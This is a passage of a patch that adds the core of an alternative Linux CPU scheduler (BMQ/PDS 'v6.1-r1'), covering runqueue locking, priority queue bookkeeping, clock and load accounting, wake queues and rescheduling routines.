++ * Print a warning if need_resched is set for the given duration (if
++ * LATENCY_WARN is enabled).
++ *
++ * If sysctl_resched_latency_warn_once is set, only one warning will be shown
++ * per boot.
++ */
++__read_mostly int sysctl_resched_latency_warn_ms = 100;
++__read_mostly int sysctl_resched_latency_warn_once = 1;
++#else
++#define sched_feat(x)	(0)
++#endif /* CONFIG_SCHED_DEBUG */
++
++#define ALT_SCHED_VERSION "v6.1-r1"
++
++/* rt_prio(prio) defined in include/linux/sched/rt.h */
++#define rt_task(p)		rt_prio((p)->prio)
++#define rt_policy(policy)	((policy) == SCHED_FIFO || (policy) == SCHED_RR)
++#define task_has_rt_policy(p)	(rt_policy((p)->policy))
++
++#define STOP_PRIO		(MAX_RT_PRIO - 1)
++
++/* Default time slice is 4 in ms, can be set via kernel parameter "sched_timeslice" */
++u64 sched_timeslice_ns __read_mostly = (4 << 20);
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx);
++
++#ifdef CONFIG_SCHED_BMQ
++#include "bmq.h"
++#endif
++#ifdef CONFIG_SCHED_PDS
++#include "pds.h"
++#endif
++
++static int __init sched_timeslice(char *str)
++{
++	int timeslice_ms;
++
++	get_option(&str, &timeslice_ms);
++	if (2 != timeslice_ms)
++		timeslice_ms = 4;
++	sched_timeslice_ns = timeslice_ms << 20;
++	sched_timeslice_imp(timeslice_ms);
++
++	return 0;
++}
++early_param("sched_timeslice", sched_timeslice);
++
++/* Reschedule if less than this many μs left */
++#define RESCHED_NS		(100 << 10)
++
++/**
++ * sched_yield_type - Choose what sort of yield sched_yield will perform.
++ * 0: No yield.
++ * 1: Deboost and requeue task. (default)
++ * 2: Set rq skip task.
++ */
++int sched_yield_type __read_mostly = 1;
++
++#ifdef CONFIG_SMP
++static cpumask_t sched_rq_pending_mask ____cacheline_aligned_in_smp;
++
++DEFINE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
++DEFINE_PER_CPU(cpumask_t *, sched_cpu_topo_end_mask);
++
++#ifdef CONFIG_SCHED_SMT
++DEFINE_STATIC_KEY_FALSE(sched_smt_present);
++EXPORT_SYMBOL_GPL(sched_smt_present);
++#endif
++
++/*
++ * Keep a unique ID per domain (we use the first CPUs number in the cpumask of
++ * the domain), this allows us to quickly tell if two cpus are in the same cache
++ * domain, see cpus_share_cache().
++ */
++DEFINE_PER_CPU(int, sd_llc_id);
++#endif /* CONFIG_SMP */
++
++static DEFINE_MUTEX(sched_hotcpu_mutex);
++
++DEFINE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
++
++#ifndef prepare_arch_switch
++# define prepare_arch_switch(next)	do { } while (0)
++#endif
++#ifndef finish_arch_post_lock_switch
++# define finish_arch_post_lock_switch()	do { } while (0)
++#endif
++
++#ifdef CONFIG_SCHED_SMT
++static cpumask_t sched_sg_idle_mask ____cacheline_aligned_in_smp;
++#endif
++static cpumask_t sched_preempt_mask[SCHED_QUEUE_BITS] ____cacheline_aligned_in_smp;
++static cpumask_t *const sched_idle_mask = &sched_preempt_mask[0];
++
++/* sched_queue related functions */
++static inline void sched_queue_init(struct sched_queue *q)
++{
++	int i;
++
++	bitmap_zero(q->bitmap, SCHED_QUEUE_BITS);
++	for(i = 0; i < SCHED_BITS; i++)
++		INIT_LIST_HEAD(&q->heads[i]);
++}
++
++/*
++ * Init idle task and put into queue structure of rq
++ * IMPORTANT: may be called multiple times for a single cpu
++ */
++static inline void sched_queue_init_idle(struct sched_queue *q,
++					 struct task_struct *idle)
++{
++	idle->sq_idx = IDLE_TASK_SCHED_PRIO;
++	INIT_LIST_HEAD(&q->heads[idle->sq_idx]);
++	list_add(&idle->sq_node, &q->heads[idle->sq_idx]);
++}
++
++static inline void
++clear_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_clear_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - 1 - pr);
++}
++
++static inline void
++set_recorded_preempt_mask(int pr, int low, int high, int cpu)
++{
++	if (low < pr && pr <= high)
++		cpumask_set_cpu(cpu, sched_preempt_mask + SCHED_QUEUE_BITS - 1 - pr);
++}
++
++static atomic_t sched_prio_record = ATOMIC_INIT(0);
++
++/* water mark related functions */
++static inline void update_sched_preempt_mask(struct rq *rq)
++{
++	unsigned long prio = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	unsigned long last_prio = rq->prio;
++	int cpu, pr;
++
++	if (prio == last_prio)
++		return;
++
++	rq->prio = prio;
++	cpu = cpu_of(rq);
++	pr = atomic_read(&sched_prio_record);
++
++	if (prio < last_prio) {
++		if (IDLE_TASK_SCHED_PRIO == last_prio) {
++			cpumask_clear_cpu(cpu, sched_idle_mask);
++			last_prio -= 2;
++#ifdef CONFIG_SCHED_SMT
++			if (static_branch_likely(&sched_smt_present))
++				cpumask_andnot(&sched_sg_idle_mask,
++					       &sched_sg_idle_mask, cpu_smt_mask(cpu));
++#endif
++		}
++		clear_recorded_preempt_mask(pr, prio, last_prio, cpu);
++
++		return;
++	}
++	/* last_prio < prio */
++	if (IDLE_TASK_SCHED_PRIO == prio) {
++		cpumask_set_cpu(cpu, sched_idle_mask);
++		prio -= 2;
++#ifdef CONFIG_SCHED_SMT
++		if (static_branch_likely(&sched_smt_present)) {
++			cpumask_t tmp;
++
++			cpumask_and(&tmp, cpu_smt_mask(cpu), sched_idle_mask);
++			if (cpumask_equal(&tmp, cpu_smt_mask(cpu)))
++				cpumask_or(&sched_sg_idle_mask,
++					   &sched_sg_idle_mask, cpu_smt_mask(cpu));
++		}
++#endif
++	}
++	set_recorded_preempt_mask(pr, last_prio, prio, cpu);
++}
++
++/*
++ * This routine assume that the idle task always in queue
++ */
++static inline struct task_struct *sched_rq_first_task(struct rq *rq)
++{
++	unsigned long idx = find_first_bit(rq->queue.bitmap, SCHED_QUEUE_BITS);
++	const struct list_head *head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++	return list_first_entry(head, struct task_struct, sq_node);
++}
++
++static inline struct task_struct *
++sched_rq_next_task(struct task_struct *p, struct rq *rq)
++{
++	unsigned long idx = p->sq_idx;
++	struct list_head *head = &rq->queue.heads[idx];
++
++	if (list_is_last(&p->sq_node, head)) {
++		idx = find_next_bit(rq->queue.bitmap, SCHED_QUEUE_BITS,
++				    sched_idx2prio(idx, rq) + 1);
++		head = &rq->queue.heads[sched_prio2idx(idx, rq)];
++
++		return list_first_entry(head, struct task_struct, sq_node);
++	}
++
++	return list_next_entry(p, sq_node);
++}
++
++static inline struct task_struct *rq_runnable_task(struct rq *rq)
++{
++	struct task_struct *next = sched_rq_first_task(rq);
++
++	if (unlikely(next == rq->skip))
++		next = sched_rq_next_task(next, rq);
++
++	return next;
++}
++
++/*
++ * Serialization rules:
++ *
++ * Lock order:
++ *
++ *   p->pi_lock
++ *     rq->lock
++ *       hrtimer_cpu_base->lock (hrtimer_start() for bandwidth controls)
++ *
++ *  rq1->lock
++ *    rq2->lock  where: rq1 < rq2
++ *
++ * Regular state:
++ *
++ * Normal scheduling state is serialized by rq->lock. __schedule() takes the
++ * local CPU's rq->lock, it optionally removes the task from the runqueue and
++ * always looks at the local rq data structures to find the most eligible task
++ * to run next.
++ *
++ * Task enqueue is also under rq->lock, possibly taken from another CPU.
++ * Wakeups from another LLC domain might use an IPI to transfer the enqueue to
++ * the local CPU to avoid bouncing the runqueue state around [ see
++ * ttwu_queue_wakelist() ]
++ *
++ * Task wakeup, specifically wakeups that involve migration, are horribly
++ * complicated to avoid having to take two rq->locks.
++ *
++ * Special state:
++ *
++ * System-calls and anything external will use task_rq_lock() which acquires
++ * both p->pi_lock and rq->lock. As a consequence the state they change is
++ * stable while holding either lock:
++ *
++ *  - sched_setaffinity()/
++ *    set_cpus_allowed_ptr():	p->cpus_ptr, p->nr_cpus_allowed
++ *  - set_user_nice():		p->se.load, p->*prio
++ *  - __sched_setscheduler():	p->sched_class, p->policy, p->*prio,
++ *				p->se.load, p->rt_priority,
++ *				p->dl.dl_{runtime, deadline, period, flags, bw, density}
++ *  - sched_setnuma():		p->numa_preferred_nid
++ *  - sched_move_task():        p->sched_task_group
++ *  - uclamp_update_active()	p->uclamp*
++ *
++ * p->state <- TASK_*:
++ *
++ *   is changed locklessly using set_current_state(), __set_current_state() or
++ *   set_special_state(), see their respective comments, or by
++ *   try_to_wake_up(). This latter uses p->pi_lock to serialize against
++ *   concurrent self.
++ *
++ * p->on_rq <- { 0, 1 = TASK_ON_RQ_QUEUED, 2 = TASK_ON_RQ_MIGRATING }:
++ *
++ *   is set by activate_task() and cleared by deactivate_task(), under
++ *   rq->lock. Non-zero indicates the task is runnable, the special
++ *   ON_RQ_MIGRATING state is used for migration without holding both
++ *   rq->locks. It indicates task_cpu() is not stable, see task_rq_lock().
++ *
++ * p->on_cpu <- { 0, 1 }:
++ *
++ *   is set by prepare_task() and cleared by finish_task() such that it will be
++ *   set before p is scheduled-in and cleared after p is scheduled-out, both
++ *   under rq->lock. Non-zero indicates the task is running on its CPU.
++ *
++ *   [ The astute reader will observe that it is possible for two tasks on one
++ *     CPU to have ->on_cpu = 1 at the same time. ]
++ *
++ * task_cpu(p): is changed by set_task_cpu(), the rules are:
++ *
++ *  - Don't call set_task_cpu() on a blocked task:
++ *
++ *    We don't care what CPU we're not running on, this simplifies hotplug,
++ *    the CPU assignment of blocked tasks isn't required to be valid.
++ *
++ *  - for try_to_wake_up(), called under p->pi_lock:
++ *
++ *    This allows try_to_wake_up() to only take one rq->lock, see its comment.
++ *
++ *  - for migration called under rq->lock:
++ *    [ see task_on_rq_migrating() in task_rq_lock() ]
++ *
++ *    o move_queued_task()
++ *    o detach_task()
++ *
++ *  - for migration called under double_rq_lock():
++ *
++ *    o __migrate_swap_task()
++ *    o push_rt_task() / pull_rt_task()
++ *    o push_dl_task() / pull_dl_task()
++ *    o dl_task_offline_migration()
++ *
++ */
++
++/*
++ * Context: p->pi_lock
++ */
++static inline struct rq
++*__task_access_lock(struct task_struct *p, raw_spinlock_t **plock)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock(&rq->lock);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock(&rq->lock);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			*plock = NULL;
++			return rq;
++		}
++	}
++}
++
++static inline void
++__task_access_unlock(struct task_struct *p, raw_spinlock_t *lock)
++{
++	if (NULL != lock)
++		raw_spin_unlock(lock);
++}
++
++static inline struct rq
++*task_access_lock_irqsave(struct task_struct *p, raw_spinlock_t **plock,
++			  unsigned long *flags)
++{
++	struct rq *rq;
++	for (;;) {
++		rq = task_rq(p);
++		if (p->on_cpu || task_on_rq_queued(p)) {
++			raw_spin_lock_irqsave(&rq->lock, *flags);
++			if (likely((p->on_cpu || task_on_rq_queued(p))
++				   && rq == task_rq(p))) {
++				*plock = &rq->lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&rq->lock, *flags);
++		} else if (task_on_rq_migrating(p)) {
++			do {
++				cpu_relax();
++			} while (unlikely(task_on_rq_migrating(p)));
++		} else {
++			raw_spin_lock_irqsave(&p->pi_lock, *flags);
++			if (likely(!p->on_cpu && !p->on_rq &&
++				   rq == task_rq(p))) {
++				*plock = &p->pi_lock;
++				return rq;
++			}
++			raw_spin_unlock_irqrestore(&p->pi_lock, *flags);
++		}
++	}
++}
++
++static inline void
++task_access_unlock_irqrestore(struct task_struct *p, raw_spinlock_t *lock,
++			      unsigned long *flags)
++{
++	raw_spin_unlock_irqrestore(lock, *flags);
++}
++
++/*
++ * __task_rq_lock - lock the rq @p resides on.
++ */
++struct rq *__task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	lockdep_assert_held(&p->pi_lock);
++
++	for (;;) {
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p)))
++			return rq;
++		raw_spin_unlock(&rq->lock);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++/*
++ * task_rq_lock - lock p->pi_lock and lock the rq @p resides on.
++ */
++struct rq *task_rq_lock(struct task_struct *p, struct rq_flags *rf)
++	__acquires(p->pi_lock)
++	__acquires(rq->lock)
++{
++	struct rq *rq;
++
++	for (;;) {
++		raw_spin_lock_irqsave(&p->pi_lock, rf->flags);
++		rq = task_rq(p);
++		raw_spin_lock(&rq->lock);
++		/*
++		 *	move_queued_task()		task_rq_lock()
++		 *
++		 *	ACQUIRE (rq->lock)
++		 *	[S] ->on_rq = MIGRATING		[L] rq = task_rq()
++		 *	WMB (__set_task_cpu())		ACQUIRE (rq->lock);
++		 *	[S] ->cpu = new_cpu		[L] task_rq()
++		 *					[L] ->on_rq
++		 *	RELEASE (rq->lock)
++		 *
++		 * If we observe the old CPU in task_rq_lock(), the acquire of
++		 * the old rq->lock will fully serialize against the stores.
++		 *
++		 * If we observe the new CPU in task_rq_lock(), the address
++		 * dependency headed by '[L] rq = task_rq()' and the acquire
++		 * will pair with the WMB to ensure we then also see migrating.
++		 */
++		if (likely(rq == task_rq(p) && !task_on_rq_migrating(p))) {
++			return rq;
++		}
++		raw_spin_unlock(&rq->lock);
++		raw_spin_unlock_irqrestore(&p->pi_lock, rf->flags);
++
++		while (unlikely(task_on_rq_migrating(p)))
++			cpu_relax();
++	}
++}
++
++static inline void
++rq_lock_irqsave(struct rq *rq, struct rq_flags *rf)
++	__acquires(rq->lock)
++{
++	raw_spin_lock_irqsave(&rq->lock, rf->flags);
++}
++
++static inline void
++rq_unlock_irqrestore(struct rq *rq, struct rq_flags *rf)
++	__releases(rq->lock)
++{
++	raw_spin_unlock_irqrestore(&rq->lock, rf->flags);
++}
++
++void raw_spin_rq_lock_nested(struct rq *rq, int subclass)
++{
++	raw_spinlock_t *lock;
++
++	/* Matches synchronize_rcu() in __sched_core_enable() */
++	preempt_disable();
++
++	for (;;) {
++		lock = __rq_lockp(rq);
++		raw_spin_lock_nested(lock, subclass);
++		if (likely(lock == __rq_lockp(rq))) {
++			/* preempt_count *MUST* be > 1 */
++			preempt_enable_no_resched();
++			return;
++		}
++		raw_spin_unlock(lock);
++	}
++}
++
++void raw_spin_rq_unlock(struct rq *rq)
++{
++	raw_spin_unlock(rq_lockp(rq));
++}
++
++/*
++ * RQ-clock updating methods:
++ */
++
++static void update_rq_clock_task(struct rq *rq, s64 delta)
++{
++/*
++ * In theory, the compile should just see 0 here, and optimize out the call
++ * to sched_rt_avg_update. But I don't trust it...
++ */
++	s64 __maybe_unused steal = 0, irq_delta = 0;
++
++#ifdef CONFIG_IRQ_TIME_ACCOUNTING
++	irq_delta = irq_time_read(cpu_of(rq)) - rq->prev_irq_time;
++
++	/*
++	 * Since irq_time is only updated on {soft,}irq_exit, we might run into
++	 * this case when a previous update_rq_clock() happened inside a
++	 * {soft,}irq region.
++	 *
++	 * When this happens, we stop ->clock_task and only update the
++	 * prev_irq_time stamp to account for the part that fit, so that a next
++	 * update will consume the rest. This ensures ->clock_task is
++	 * monotonic.
++	 *
++	 * It does however cause some slight miss-attribution of {soft,}irq
++	 * time, a more accurate solution would be to update the irq_time using
++	 * the current rq->clock timestamp, except that would require using
++	 * atomic ops.
++	 */
++	if (irq_delta > delta)
++		irq_delta = delta;
++
++	rq->prev_irq_time += irq_delta;
++	delta -= irq_delta;
++	psi_account_irqtime(rq->curr, irq_delta);
++#endif
++#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
++	if (static_key_false((&paravirt_steal_rq_enabled))) {
++		steal = paravirt_steal_clock(cpu_of(rq));
++		steal -= rq->prev_steal_time_rq;
++
++		if (unlikely(steal > delta))
++			steal = delta;
++
++		rq->prev_steal_time_rq += steal;
++		delta -= steal;
++	}
++#endif
++
++	rq->clock_task += delta;
++
++#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
++	if ((irq_delta + steal))
++		update_irq_load_avg(rq, irq_delta + steal);
++#endif
++}
++
++static inline void update_rq_clock(struct rq *rq)
++{
++	s64 delta = sched_clock_cpu(cpu_of(rq)) - rq->clock;
++
++	if (unlikely(delta <= 0))
++		return;
++	rq->clock += delta;
++	update_rq_time_edge(rq);
++	update_rq_clock_task(rq, delta);
++}
++
++/*
++ * RQ Load update routine
++ */
++#define RQ_LOAD_HISTORY_BITS		(sizeof(s32) * 8ULL)
++#define RQ_UTIL_SHIFT			(8)
++#define RQ_LOAD_HISTORY_TO_UTIL(l)	(((l) >> (RQ_LOAD_HISTORY_BITS - 1 - RQ_UTIL_SHIFT)) & 0xff)
++
++#define LOAD_BLOCK(t)		((t) >> 17)
++#define LOAD_HALF_BLOCK(t)	((t) >> 16)
++#define BLOCK_MASK(t)		((t) & ((0x01 << 18) - 1))
++#define LOAD_BLOCK_BIT(b)	(1UL << (RQ_LOAD_HISTORY_BITS - 1 - (b)))
++#define CURRENT_LOAD_BIT	LOAD_BLOCK_BIT(0)
++
++static inline void rq_load_update(struct rq *rq)
++{
++	u64 time = rq->clock;
++	u64 delta = min(LOAD_BLOCK(time) - LOAD_BLOCK(rq->load_stamp),
++			RQ_LOAD_HISTORY_BITS - 1);
++	u64 prev = !!(rq->load_history & CURRENT_LOAD_BIT);
++	u64 curr = !!rq->nr_running;
++
++	if (delta) {
++		rq->load_history = rq->load_history >> delta;
++
++		if (delta < RQ_UTIL_SHIFT) {
++			rq->load_block += (~BLOCK_MASK(rq->load_stamp)) * prev;
++			if (!!LOAD_HALF_BLOCK(rq->load_block) ^ curr)
++				rq->load_history ^= LOAD_BLOCK_BIT(delta);
++		}
++
++		rq->load_block = BLOCK_MASK(time) * prev;
++	} else {
++		rq->load_block += (time - rq->load_stamp) * prev;
++	}
++	if (prev ^ curr)
++		rq->load_history ^= CURRENT_LOAD_BIT;
++	rq->load_stamp = time;
++}
++
++unsigned long rq_load_util(struct rq *rq, unsigned long max)
++{
++	return RQ_LOAD_HISTORY_TO_UTIL(rq->load_history) * (max >> RQ_UTIL_SHIFT);
++}
++
++#ifdef CONFIG_SMP
++unsigned long sched_cpu_util(int cpu)
++{
++	return rq_load_util(cpu_rq(cpu), arch_scale_cpu_capacity(cpu));
++}
++#endif /* CONFIG_SMP */
++
++#ifdef CONFIG_CPU_FREQ
++/**
++ * cpufreq_update_util - Take a note about CPU utilization changes.
++ * @rq: Runqueue to carry out the update for.
++ * @flags: Update reason flags.
++ *
++ * This function is called by the scheduler on the CPU whose utilization is
++ * being updated.
++ *
++ * It can only be called from RCU-sched read-side critical sections.
++ *
++ * The way cpufreq is currently arranged requires it to evaluate the CPU
++ * performance state (frequency/voltage) on a regular basis to prevent it from
++ * being stuck in a completely inadequate performance level for too long.
++ * That is not guaranteed to happen if the updates are only triggered from CFS
++ * and DL, though, because they may not be coming in if only RT tasks are
++ * active all the time (or there are RT tasks only).
++ *
++ * As a workaround for that issue, this function is called periodically by the
++ * RT sched class to trigger extra cpufreq updates to prevent it from stalling,
++ * but that really is a band-aid.  Going forward it should be replaced with
++ * solutions targeted more specifically at RT tasks.
++ */
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++	struct update_util_data *data;
++
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++	data = rcu_dereference_sched(*per_cpu_ptr(&cpufreq_update_util_data,
++						  cpu_of(rq)));
++	if (data)
++		data->func(data, rq_clock(rq), flags);
++}
++#else
++static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
++{
++#ifdef CONFIG_SMP
++	rq_load_update(rq);
++#endif
++}
++#endif /* CONFIG_CPU_FREQ */
++
++#ifdef CONFIG_NO_HZ_FULL
++/*
++ * Tick may be needed by tasks in the runqueue depending on their policy and
++ * requirements. If tick is needed, lets send the target an IPI to kick it out
++ * of nohz mode if necessary.
++ */
++static inline void sched_update_tick_dependency(struct rq *rq)
++{
++	int cpu = cpu_of(rq);
++
++	if (!tick_nohz_full_cpu(cpu))
++		return;
++
++	if (rq->nr_running < 2)
++		tick_nohz_dep_clear_cpu(cpu, TICK_DEP_BIT_SCHED);
++	else
++		tick_nohz_dep_set_cpu(cpu, TICK_DEP_BIT_SCHED);
++}
++#else /* !CONFIG_NO_HZ_FULL */
++static inline void sched_update_tick_dependency(struct rq *rq) { }
++#endif
++
++bool sched_task_on_rq(struct task_struct *p)
++{
++	return task_on_rq_queued(p);
++}
++
++unsigned long get_wchan(struct task_struct *p)
++{
++	unsigned long ip = 0;
++	unsigned int state;
++
++	if (!p || p == current)
++		return 0;
++
++	/* Only get wchan if task is blocked and we can keep it that way. */
++	raw_spin_lock_irq(&p->pi_lock);
++	state = READ_ONCE(p->__state);
++	smp_rmb(); /* see try_to_wake_up() */
++	if (state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq)
++		ip = __get_wchan(p);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	return ip;
++}
++
++/*
++ * Add/Remove/Requeue task to/from the runqueue routines
++ * Context: rq->lock
++ */
++#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
++	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
++	sched_info_dequeue(rq, p);						\
++										\
++	list_del(&p->sq_node);							\
++	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
++		clear_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
++#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
++	sched_info_enqueue(rq, p);					\
++	psi_enqueue(p, flags);						\
++									\
++	p->sq_idx = task_sched_prio_idx(p, rq);				\
++	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
++	set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++
++static inline void dequeue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: dequeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: dequeue task reside on cpu%d from cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_DEQUEUE_TASK(p, rq, flags);
++	--rq->nr_running;
++#ifdef CONFIG_SMP
++	if (1 == rq->nr_running)
++		cpumask_clear_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void enqueue_task(struct task_struct *p, struct rq *rq, int flags)
++{
++	lockdep_assert_held(&rq->lock);
++
++	/*printk(KERN_INFO "sched: enqueue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: enqueue task reside on cpu%d to cpu%d\n",
++		  task_cpu(p), cpu_of(rq));
++
++	__SCHED_ENQUEUE_TASK(p, rq, flags);
++	update_sched_preempt_mask(rq);
++	++rq->nr_running;
++#ifdef CONFIG_SMP
++	if (2 == rq->nr_running)
++		cpumask_set_cpu(cpu_of(rq), &sched_rq_pending_mask);
++#endif
++
++	sched_update_tick_dependency(rq);
++}
++
++static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx)
++{
++	lockdep_assert_held(&rq->lock);
++	/*printk(KERN_INFO "sched: requeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
++	WARN_ONCE(task_rq(p) != rq, "sched: cpu[%d] requeue task reside on cpu%d\n",
++		  cpu_of(rq), task_cpu(p));
++
++	list_del(&p->sq_node);
++	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
++	if (idx != p->sq_idx) {
++		if (list_empty(&rq->queue.heads[p->sq_idx]))
++			clear_bit(sched_idx2prio(p->sq_idx, rq),
++				  rq->queue.bitmap);
++		p->sq_idx = idx;
++		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
++		update_sched_preempt_mask(rq);
++	}
++}
++
++/*
++ * cmpxchg based fetch_or, macro so it works for different integer types
++ */
++#define fetch_or(ptr, mask)						\
++	({								\
++		typeof(ptr) _ptr = (ptr);				\
++		typeof(mask) _mask = (mask);				\
++		typeof(*_ptr) _val = *_ptr;				\
++									\
++		do {							\
++		} while (!try_cmpxchg(_ptr, &_val, _val | _mask));	\
++	_val;								\
++})
++
++#if defined(CONFIG_SMP) && defined(TIF_POLLING_NRFLAG)
++/*
++ * Atomically set TIF_NEED_RESCHED and test for TIF_POLLING_NRFLAG,
++ * this avoids any races wrt polling state changes and thereby avoids
++ * spurious IPIs.
++ */
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	return !(fetch_or(&ti->flags, _TIF_NEED_RESCHED) & _TIF_POLLING_NRFLAG);
++}
++
++/*
++ * Atomically set TIF_NEED_RESCHED if TIF_POLLING_NRFLAG is set.
++ *
++ * If this returns true, then the idle task promises to call
++ * sched_ttwu_pending() and reschedule soon.
++ */
++static bool set_nr_if_polling(struct task_struct *p)
++{
++	struct thread_info *ti = task_thread_info(p);
++	typeof(ti->flags) val = READ_ONCE(ti->flags);
++
++	for (;;) {
++		if (!(val & _TIF_POLLING_NRFLAG))
++			return false;
++		if (val & _TIF_NEED_RESCHED)
++			return true;
++		if (try_cmpxchg(&ti->flags, &val, val | _TIF_NEED_RESCHED))
++			break;
++	}
++	return true;
++}
++
++#else
++static inline bool set_nr_and_not_polling(struct task_struct *p)
++{
++	set_tsk_need_resched(p);
++	return true;
++}
++
++#ifdef CONFIG_SMP
++static inline bool set_nr_if_polling(struct task_struct *p)
++{
++	return false;
++}
++#endif
++#endif
++
++static bool __wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	struct wake_q_node *node = &task->wake_q;
++
++	/*
++	 * Atomically grab the task, if ->wake_q is !nil already it means
++	 * it's already queued (either by us or someone else) and will get the
++	 * wakeup due to that.
++	 *
++	 * In order to ensure that a pending wakeup will observe our pending
++	 * state, even in the failed case, an explicit smp_mb() must be used.
++	 */
++	smp_mb__before_atomic();
++	if (unlikely(cmpxchg_relaxed(&node->next, NULL, WAKE_Q_TAIL)))
++		return false;
++
++	/*
++	 * The head is context local, there can be no concurrency.
++	 */
++	*head->lastp = node;
++	head->lastp = &node->next;
++	return true;
++}
++
++/**
++ * wake_q_add() - queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ */
++void wake_q_add(struct wake_q_head *head, struct task_struct *task)
++{
++	if (__wake_q_add(head, task))
++		get_task_struct(task);
++}
++
++/**
++ * wake_q_add_safe() - safely queue a wakeup for 'later' waking.
++ * @head: the wake_q_head to add @task to
++ * @task: the task to queue for 'later' wakeup
++ *
++ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
++ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
++ * instantly.
++ *
++ * This function must be used as-if it were wake_up_process(); IOW the task
++ * must be ready to be woken at this location.
++ *
++ * This function is essentially a task-safe equivalent to wake_q_add(). Callers
++ * that already hold reference to @task can call the 'safe' version and trust
++ * wake_q to do the right thing depending whether or not the @task is already
++ * queued for wakeup.
++ */
++void wake_q_add_safe(struct wake_q_head *head, struct task_struct *task)
++{
++	if (!__wake_q_add(head, task))
++		put_task_struct(task);
++}
++
++void wake_up_q(struct wake_q_head *head)
++{
++	struct wake_q_node *node = head->first;
++
++	while (node != WAKE_Q_TAIL) {
++		struct task_struct *task;
++
++		task = container_of(node, struct task_struct, wake_q);
++		/* task can safely be re-inserted now: */
++		node = node->next;
++		task->wake_q.next = NULL;
++
++		/*
++		 * wake_up_process() executes a full barrier, which pairs with
++		 * the queueing in wake_q_add() so as not to miss wakeups.
++		 */
++		wake_up_process(task);
++		put_task_struct(task);
++	}
++}
++
++/*
++ * resched_curr - mark rq's current task 'to be rescheduled now'.
++ *
++ * On UP this means the setting of the need_resched flag, on SMP it
++ * might also involve a cross-CPU call to trigger the scheduler on
++ * the target CPU.
++ */
++void resched_curr(struct rq *rq)
++{
++	struct task_struct *curr = rq->curr;
++	int cpu;
++
++	lockdep_assert_held(&rq->lock);
++
++	if (test_tsk_need_resched(curr))
++		return;
++
++	cpu = cpu_of(rq);
++	if (cpu == smp_processor_id()) {
++		set_tsk_need_resched(curr);
++		set_preempt_need_resched();
++		return;
++	}
++
++	if (set_nr_and_not_polling(curr))
++		smp_send_reschedule(cpu);
++	else
++		trace_sched_wake_idle_without_ipi(cpu);
++}
++
++void resched_cpu(int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (cpu_online(cpu) || cpu == smp_processor_id())
++		resched_curr(cpu_rq(cpu));
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++}
++
++#ifdef CONFIG_SMP
++#ifdef CONFIG_NO_HZ_COMMON
++void nohz_balance_enter_idle(int cpu) {}
++
++void select_nohz_load_balancer(int stop_tick) {}
++
++void set_cpu_sd_state_idle(void) {}
++
++/*
++ * In the semi idle case, use the nearest busy CPU for migrating timers
++ * from an idle CPU.  This is good for power-savings.
++ *
++ * We don't do similar optimization for completely idle system, as
++ * selecting an idle CPU will add more delays to the timers than intended
